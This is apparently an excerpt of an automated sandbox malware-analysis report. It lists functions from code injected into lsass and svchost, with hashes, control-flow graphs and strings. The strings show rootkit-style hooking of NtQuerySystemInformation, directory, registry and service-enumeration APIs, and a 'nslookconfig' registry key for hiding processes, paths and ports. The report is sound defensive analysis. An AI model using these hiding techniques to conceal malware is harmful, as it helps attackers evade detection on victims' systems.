                            • Instruction Fuzzy Hash: B341F462600B8081EF259B1194CDB7A76A8E75DBECF584219EBAD4F7D6CE38C5C1C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BC16F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: e85f71a24581bc7d95ca82bba9955af0ee3ae7c2ba14e39ae76acde947c1c790
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 2341A272728A8086EB209F25E48C7A977A0F798798F844129EF4D9B794EF3CC581C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BBC810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 85bff6256d5d9061ee53d656d960a2c1dd0e8d0dc48dc5d5e63e1345f9992c5a
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: 59110B36608B8086D764CB16B488A9AB7A4F7CDB84F54412AEFCD87B19CF38C5908B04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB9CE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: f23cd95b5add426011c6e79e018df6fa1a78ea792ee21c11a5a7243f4b7c53d9
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: 84111C32214B8482EB258F15F488759B7E5F788B98F184225DF8D0BB68DF38C591CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BBC7AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: 04efea30d927d977bfa8f5a6e1965247cd50753e7860c3599af33ddb181aa571
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: AEF05E2521079082EB089B42B4CDE996760E78CB88F48512D9B591BB59CF38C9C5C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BBC758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: 09e169d2370290b205d7a4e36ce3d48f6cf38eab89077aa25944284a77839d9f
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: A1E06D75210640A2EA188B51F88DF992622E78C788F88512E9B4A0E659CE38C9C8C318
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 000001CAF3D03F20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: d1ae013908fa92126ee6757031797c06279e3bb48e1c14735a4ba13b57a348ea
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: 854181B968674886FB669B21F504FDE23B1FF44F48F84482DD94946798EF3DC0148762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D01ED0 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: 029a89921294d6a0baba529d7f28597fcd358f65efd342ffbf0f0ecc0d19d220
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: 64E0E5BC28360940FB836766AC41BDC12AC6F08FCCF94482CB949477AAED38C0541223
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3CD35D0 Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 39 1caf3cd35d0-1caf3cd3632 call 1caf3cd34b0 * 4 48 1caf3cd3638-1caf3cd363b 39->48 49 1caf3cd38d2-1caf3cd38e6 39->49 48->49 50 1caf3cd3641-1caf3cd3644 48->50 50->49 51 1caf3cd364a-1caf3cd364d 50->51 51->49 52 1caf3cd3653-1caf3cd3672 51->52 52->49 54 1caf3cd3678-1caf3cd3681 52->54 55 1caf3cd3683-1caf3cd3689 54->55 56 1caf3cd36a1-1caf3cd36b5 54->56 57 1caf3cd3690-1caf3cd369f 55->57 58 1caf3cd36b7 56->58 59 1caf3cd370f-1caf3cd3716 56->59 57->56 57->57 62 1caf3cd36c0-1caf3cd36df 58->62 60 1caf3cd37cc-1caf3cd37d4 59->60 61 1caf3cd371c-1caf3cd3730 59->61 67 1caf3cd389e-1caf3cd38ce 60->67 68 1caf3cd37da-1caf3cd37f1 60->68 63 1caf3cd37c7 61->63 64 1caf3cd3736-1caf3cd373b 61->64 65 1caf3cd3704-1caf3cd370d 62->65 66 1caf3cd36e1-1caf3cd36e7 62->66 63->60 69 1caf3cd3740-1caf3cd374e LoadLibraryA 64->69 65->59 65->62 70 1caf3cd36f0-1caf3cd3702 66->70 67->49 68->67 71 1caf3cd37f7 68->71 73 1caf3cd37af-1caf3cd37b8 69->73 74 1caf3cd3750-1caf3cd3760 69->74 70->65 70->70 72 1caf3cd3800-1caf3cd3815 71->72 76 1caf3cd3817 72->76 77 1caf3cd388d-1caf3cd3898 72->77 73->69 79 1caf3cd37ba-1caf3cd37c2 73->79 74->73 78 1caf3cd3762-1caf3cd3768 74->78 80 1caf3cd3820-1caf3cd3831 76->80 77->67 77->72 81 1caf3cd378e-1caf3cd3798 78->81 82 1caf3cd376a-1caf3cd378c 78->82 79->63 83 1caf3cd3833-1caf3cd383c 80->83 84 1caf3cd383e-1caf3cd3842 80->84 85 1caf3cd379e-1caf3cd37ad 81->85 82->85 86 1caf3cd387a-1caf3cd388b 83->86 87 1caf3cd3844-1caf3cd384d 84->87 88 1caf3cd384f-1caf3cd3853 84->88 85->73 85->78 86->77 86->80 87->86 89 1caf3cd3855-1caf3cd3868 88->89 90 1caf3cd386a-1caf3cd386e 88->90 89->86 90->86 91 1caf3cd3870-1caf3cd3875 90->91 91->86
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: 29caa52aff5cca98e2d0c68ca2156f1eff511beb25dd2c9af1f815c6e71ec185
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: 0981267378269887EB568F11D860BADB7A5FF44F88F858129EE1947384DB38D826C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 000001CAF3D01400 Relevance: 47.5, APIs: 18, Strings: 9, Instructions: 240registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: c58bb8066a65f151a000036656a05f9de6509b2fed80242e85951157a823c432
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 1DC16ABA652B188AF711DF62E840B9D37B4FB84F88F808819DB4947B59DF78C064C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D0BEC8 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: 909c98b11edddad62a52aaf304efb61316b3e130d79653da166d3d3d242230ab
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: 91318E7A255B848AEB619F25E8407DE37B0FB88B58F800519EA8D43BA8DF38C155CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D11000 Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: fc12a3036a8561d052783c74c59ec7b0c05d9a3eadb3f13c4dd6905848196655
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: A9D1227A745B848AF702DB64D4406DDBBB5FB44B8CF94461ACF8E47B89DA34C01AC311
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D01F20 Relevance: 57.9, APIs: 21, Strings: 12, Instructions: 167libraryloaderthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 92 1caf3d01f20-1caf3d01f2b 93 1caf3d01f31-1caf3d01f62 call 1caf3d069c0 GetCurrentThread call 1caf3d06ee0 GetModuleHandleA 92->93 94 1caf3d02255-1caf3d02259 92->94 99 1caf3d01f64-1caf3d01f7e GetProcAddress 93->99 100 1caf3d01f95 93->100 101 1caf3d01f9c-1caf3d01fac GetModuleHandleA 99->101 102 1caf3d01f80-1caf3d01f93 call 1caf3d05fa0 99->102 100->101 103 1caf3d01fae-1caf3d01fc8 GetProcAddress 101->103 104 1caf3d01fdf 101->104 102->101 107 1caf3d01fca-1caf3d01fdd call 1caf3d05fa0 103->107 108 1caf3d01fe6-1caf3d01ff6 GetModuleHandleA 103->108 104->108 107->108 110 1caf3d01ff8-1caf3d02012 GetProcAddress 108->110 111 1caf3d02029 108->111 113 1caf3d02030-1caf3d02040 GetModuleHandleA 110->113 114 1caf3d02014-1caf3d02027 call 1caf3d05fa0 110->114 111->113 116 1caf3d02042-1caf3d0205c GetProcAddress 113->116 117 1caf3d02073 113->117 114->113 118 1caf3d0207a-1caf3d0208a GetModuleHandleA 116->118 119 1caf3d0205e-1caf3d02071 call 1caf3d05fa0 116->119 117->118 122 1caf3d0208c-1caf3d020a6 GetProcAddress 118->122 123 1caf3d020bd 118->123 119->118 125 1caf3d020c4-1caf3d020d4 GetModuleHandleA 122->125 126 1caf3d020a8-1caf3d020bb call 1caf3d05fa0 122->126 123->125 128 1caf3d020d6-1caf3d020f0 GetProcAddress 125->128 129 1caf3d02107 125->129 126->125 130 1caf3d0210e-1caf3d0211e GetModuleHandleA 128->130 132 1caf3d020f2-1caf3d02105 call 1caf3d05fa0 128->132 129->130 133 1caf3d02120-1caf3d0213a GetProcAddress 130->133 134 1caf3d02151 130->134 132->130 136 1caf3d0213c-1caf3d0214f call 1caf3d05fa0 133->136 137 1caf3d02158-1caf3d02168 GetModuleHandleA 133->137 134->137 136->137 140 1caf3d0216a-1caf3d02184 GetProcAddress 137->140 141 1caf3d0219b 137->141 143 1caf3d021a2-1caf3d021b2 GetModuleHandleA 140->143 144 1caf3d02186-1caf3d02199 call 1caf3d05fa0 140->144 141->143 146 1caf3d021b4-1caf3d021ce GetProcAddress 143->146 147 1caf3d021e5 143->147 144->143 148 1caf3d021ec-1caf3d021fc GetModuleHandleA 146->148 150 1caf3d021d0-1caf3d021e3 call 1caf3d05fa0 146->150 147->148 151 1caf3d0223b 148->151 152 1caf3d021fe-1caf3d02218 GetProcAddress 148->152 150->148 156 1caf3d02242-1caf3d0224b 151->156 155 1caf3d0221a-1caf3d02236 call 1caf3d05fa0 152->155 152->156 158 1caf3d06a30-1caf3d06a3f call 1caf3d06a40 155->158 156->158
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 3e5b2724fe78ddbb8df1db7f85234bb34c61e460faa4a1eafde48577e3918a5d
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: 819190BC287B0D96FB57EB15E854BDC26A5BF48F48FC4581D9909022A9EF38C158D233
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D029E0 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 379stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 233 1caf3d029e0-1caf3d02abc call 1caf3d20ca8 236 1caf3d02ac2-1caf3d02ac6 233->236 237 1caf3d02fa8-1caf3d02fca call 1caf3d083e0 233->237 236->237 239 1caf3d02acc-1caf3d02ada 236->239 239->237 241 1caf3d02ae0-1caf3d02b25 call 1caf3d09890 * 3 GetFileType 239->241 248 1caf3d02b30-1caf3d02b4b GetFinalPathNameByHandleW 241->248 249 1caf3d02b27-1caf3d02b2e 241->249 251 1caf3d02b4d-1caf3d02b68 call 1caf3d0a610 248->251 252 1caf3d02b92-1caf3d02b96 248->252 250 1caf3d02b85-1caf3d02b8c lstrcpyW 249->250 250->252 251->252 259 1caf3d02b6a-1caf3d02b7c lstrlenW 251->259 254 1caf3d02dfc-1caf3d02e11 252->254 255 1caf3d02b9c-1caf3d02bb6 call 1caf3d03b00 252->255 257 1caf3d02e15-1caf3d02e1f 254->257 265 1caf3d02bd3-1caf3d02c0c call 1caf3d03b00 lstrcmpiW 255->265 266 1caf3d02bb8-1caf3d02bcd call 1caf3d0a610 255->266 260 1caf3d02e3d-1caf3d02e54 call 1caf3d03b00 257->260 261 1caf3d02e21-1caf3d02e33 257->261 259->252 263 1caf3d02b7e 259->263 273 1caf3d02e73-1caf3d02ea8 call 1caf3d03b00 lstrcmpiW 260->273 274 1caf3d02e56-1caf3d02e6d call 1caf3d0a610 260->274 261->260 263->250 276 1caf3d02c0e-1caf3d02c25 lstrcpyW lstrcatW 265->276 277 1caf3d02c27-1caf3d02c30 PathCombineW 265->277 266->265 275 1caf3d02cb0-1caf3d02cf8 call 1caf3d20ca8 266->275 289 1caf3d02eaa-1caf3d02ec1 lstrcpyW lstrcatW 273->289 290 1caf3d02ec3-1caf3d02ecc PathCombineW 273->290 274->273 287 1caf3d02f4c-1caf3d02f4f 274->287 275->237 288 1caf3d02cfe-1caf3d02d16 call 1caf3d03b00 275->288 281 1caf3d02c33-1caf3d02c3d 276->281 277->281 285 1caf3d02c43-1caf3d02c4a 281->285 286 1caf3d02fa4 281->286 285->286 291 1caf3d02c50-1caf3d02c55 285->291 286->237 293 1caf3d02f71-1caf3d02f74 287->293 294 1caf3d02f51-1caf3d02f6f call 1caf3d09480 287->294 305 1caf3d02d35-1caf3d02d6e call 1caf3d03b00 lstrcmpiW 288->305 306 1caf3d02d18-1caf3d02d2f call 1caf3d0a610 288->306 295 1caf3d02ecf-1caf3d02ed9 289->295 290->295 291->286 296 1caf3d02c5b 291->296 302 1caf3d02f7d-1caf3d02f80 293->302 303 1caf3d02f76-1caf3d02f7b 293->303 304 1caf3d02f31-1caf3d02f34 294->304 299 1caf3d02edb-1caf3d02ee2 295->299 300 1caf3d02f23-1caf3d02f2e 295->300 301 1caf3d02c60-1caf3d02c71 296->301 299->300 308 1caf3d02ee4-1caf3d02ee9 299->308 300->304 309 1caf3d02c7b lstrcmpW 301->309 310 1caf3d02c73-1caf3d02c79 lstrcmpiW 301->310 302->286 311 1caf3d02f82-1caf3d02f9b 302->311 303->237 304->286 312 1caf3d02f36-1caf3d02f3e 304->312 323 1caf3d02d70-1caf3d02d87 lstrcpyW lstrcatW 305->323 324 1caf3d02d89-1caf3d02d92 PathCombineW 305->324 306->275 306->305 308->300 315 1caf3d02eeb 308->315 316 1caf3d02c81-1caf3d02c8b 309->316 310->316 311->286 312->257 319 1caf3d02ef0-1caf3d02f01 315->319 320 1caf3d02c8d-1caf3d02c91 316->320 321 1caf3d02c98-1caf3d02ca7 316->321 325 1caf3d02f0b lstrcmpW 319->325 326 1caf3d02f03-1caf3d02f09 lstrcmpiW 319->326 320->301 322 1caf3d02c93 320->322 321->275 322->286 327 1caf3d02d95-1caf3d02d9f 323->327 324->327 328 1caf3d02f11-1caf3d02f1b 325->328 326->328 327->286 329 1caf3d02da5-1caf3d02dac 327->329 330 1caf3d02f1d-1caf3d02f21 328->330 331 1caf3d02f43-1caf3d02f47 328->331 329->286 332 1caf3d02db2-1caf3d02db7 329->332 330->300 330->319 331->287 332->286 333 1caf3d02dbd 332->333 334 1caf3d02dc0-1caf3d02dd1 333->334 335 1caf3d02ddb lstrcmpW 334->335 336 1caf3d02dd3-1caf3d02dd9 lstrcmpiW 334->336 337 1caf3d02de1-1caf3d02deb 335->337 336->337 337->321 338 1caf3d02df1-1caf3d02df5 337->338 338->334 339 1caf3d02df7 338->339 339->286
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: f486ba0f5170a905cfabce8dbb18d4a7a91b6936a1fc17c24b3a63fa7d9a12e5
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: 5CF1B4BA2426898AFB129F22D840BDD7BB1FF48F88F844819DE4947B58DF38C545C721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D033C0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 370stringlibraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 340 1caf3d033c0-1caf3d0343c call 1caf3d20ce0 343 1caf3d03442-1caf3d03448 340->343 344 1caf3d03956-1caf3d03975 call 1caf3d083e0 340->344 343->344 345 1caf3d0344e-1caf3d03451 343->345 345->344 348 1caf3d03457-1caf3d0345a 345->348 348->344 349 1caf3d03460-1caf3d03470 GetModuleHandleA 348->349 350 1caf3d03482-1caf3d034a1 349->350 351 1caf3d03472-1caf3d0347c GetProcAddress 349->351 350->344 353 1caf3d034a7-1caf3d034c0 call 1caf3d0a610 350->353 351->350 353->344 356 1caf3d034c6-1caf3d034d5 353->356 357 1caf3d034db-1caf3d034e6 356->357 358 1caf3d0394e 356->358 357->358 359 1caf3d034ec-1caf3d0350c 357->359 358->344 360 1caf3d0393a-1caf3d03946 359->360 361 1caf3d03512-1caf3d03519 359->361 360->358 362 1caf3d03520-1caf3d0352f 361->362 363 1caf3d036d0-1caf3d036d3 362->363 364 1caf3d03535-1caf3d03538 362->364 365 1caf3d03929-1caf3d03934 363->365 366 1caf3d036d9-1caf3d036dc 363->366 367 1caf3d0353a-1caf3d03558 OpenProcess 364->367 368 1caf3d035b9-1caf3d035bc 364->368 365->360 365->362 371 1caf3d0375c-1caf3d0375f 366->371 372 1caf3d036de-1caf3d036fb OpenProcess 366->372 373 1caf3d0355a-1caf3d03575 K32GetModuleFileNameExW 367->373 374 1caf3d035b2 367->374 369 1caf3d035be-1caf3d035ca 368->369 370 1caf3d03633-1caf3d03636 368->370 375 1caf3d035cc-1caf3d035e0 369->375 376 1caf3d035f6-1caf3d035f9 369->376 379 1caf3d03672-1caf3d03675 370->379 380 1caf3d03638-1caf3d0363b 370->380 377 1caf3d03761-1caf3d0376d 371->377 378 1caf3d037a3-1caf3d037a6 371->378 381 1caf3d036fd-1caf3d03718 K32GetModuleFileNameExW 372->381 382 1caf3d03755 372->382 383 1caf3d03577-1caf3d03596 PathFindFileNameW lstrlenW 373->383 384 1caf3d035a9-1caf3d035ac CloseHandle 373->384 374->368 390 1caf3d035e3-1caf3d035e9 375->390 376->370 392 1caf3d035fb-1caf3d03607 376->392 377->378 391 1caf3d0376f-1caf3d03786 377->391 393 1caf3d037e2-1caf3d037e5 378->393 394 1caf3d037a8-1caf3d037ab 378->394 388 1caf3d0367b-1caf3d03684 379->388 389 1caf3d03837-1caf3d03853 call 1caf3d0a610 379->389 380->389 395 1caf3d03641-1caf3d0364c 380->395 385 1caf3d0371a-1caf3d03739 PathFindFileNameW lstrlenW 381->385 386 1caf3d0374c-1caf3d0374f CloseHandle 381->386 382->371 383->384 387 1caf3d03598-1caf3d035a3 lstrcpyW 383->387 384->374 385->386 398 1caf3d0373b-1caf3d03746 lstrcpyW 385->398 386->382 387->384 388->389 399 1caf3d0368a 388->399 419 1caf3d03922 389->419 420 1caf3d03859 389->420 400 1caf3d035ef-1caf3d035f4 390->400 401 1caf3d03860-1caf3d0386d 390->401 402 1caf3d03790-1caf3d03796 391->402 392->370 404 1caf3d03609-1caf3d0361d 392->404 393->389 396 1caf3d037e7-1caf3d037f0 393->396 394->389 405 1caf3d037b1-1caf3d037bc 394->405 395->379 397 1caf3d0364e-1caf3d0365d 395->397 396->389 406 1caf3d037f2-1caf3d037f6 396->406 407 1caf3d03660-1caf3d03666 397->407 398->386 408 1caf3d03690-1caf3d036a6 399->408 400->376 400->390 412 1caf3d0391a-1caf3d03920 401->412 413 1caf3d03873-1caf3d0387a 401->413 402->401 409 1caf3d0379c-1caf3d037a1 402->409 411 1caf3d03620-1caf3d03626 404->411 405->393 414 1caf3d037be-1caf3d037cc 405->414 415 1caf3d03800-1caf3d03816 406->415 407->401 416 1caf3d0366c-1caf3d03670 407->416 417 1caf3d036b0 lstrcmpW 408->417 418 1caf3d036a8-1caf3d036ae lstrcmpiW 408->418 409->378 409->402 411->401 421 1caf3d0362c-1caf3d03631 411->421 412->365 422 1caf3d0387c-1caf3d03887 413->422 423 1caf3d03889-1caf3d0388c 413->423 424 1caf3d037d0-1caf3d037d6 414->424 425 1caf3d03820 lstrcmpW 415->425 426 1caf3d03818-1caf3d0381e lstrcmpiW 415->426 416->379 416->407 427 1caf3d036b6-1caf3d036bf 417->427 418->427 419->365 420->401 421->370 421->411 428 1caf3d03899-1caf3d038aa call 1caf3d09480 422->428 430 1caf3d0388e-1caf3d03895 423->430 431 1caf3d038af-1caf3d038b7 423->431 424->401 429 1caf3d037dc-1caf3d037e0 424->429 435 1caf3d03826-1caf3d0382f 425->435 426->435 427->420 436 1caf3d036c5-1caf3d036c9 427->436 428->431 429->393 429->424 430->428 433 1caf3d038ef-1caf3d038f2 431->433 434 1caf3d038b9-1caf3d038ea call 1caf3d09480 431->434 438 1caf3d038f4-1caf3d03913 call 1caf3d09480 433->438 439 1caf3d03918 433->439 434->433 435->420 440 1caf3d03831-1caf3d03835 435->440 436->408 441 1caf3d036cb 436->441 438->439 439->412 440->389 440->415 441->389
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
